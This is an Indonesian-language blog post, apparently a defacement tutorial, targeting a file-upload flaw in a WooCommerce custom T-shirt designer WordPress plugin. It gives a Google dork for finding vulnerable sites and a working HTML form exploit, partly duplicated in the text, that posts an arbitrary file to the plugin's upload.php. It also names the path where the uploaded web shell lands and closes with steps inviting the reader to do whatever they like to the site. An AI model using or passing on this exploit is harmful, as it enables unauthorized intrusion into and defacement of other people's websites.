Deface Wp-Woocommerce Custom Tshirt Shell Upload Vulnerability
Langsung saja ke tutorial !
Dork : inurl:/wp-content/plugins/woocommerce-custom-t-shirt-
*Yang laen use your brain atau Contact mimin aj :D . biasanya dia bisa buat dork sendiri
HTML Exploit :
<form enctype="multipart/form-data"
action="http://www.targetkalian.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
action="http://www.targetkalian.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Exploit : /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php
Lokasi Shell : /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/(Nomor random).php
Tutorial :
1.Jika ada tulisan "error" di web tersebut , berarti Vuln
2.Copy Link yang Vuln , kemudian paste di HTML Exploit Yang Bertanda Warna Merah Diatas
3.Pilih Shell kalian , kemudian klik Upload
4.Maka akan muncul angka acak Contoh : "1285798710.php"
5.Akses Shellnya : /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/(Nomor acak yang tadi).php
6.Enjoy ! Terserah dah mau di apain tuh web
-=-THANKS FOR READING :D-=-
Post a Comment
Rules :
1.Komentar yang baik,sopan, dan jelas
2.Jangan spam -__-
3.Jika ada problem dari postingnya, koment :3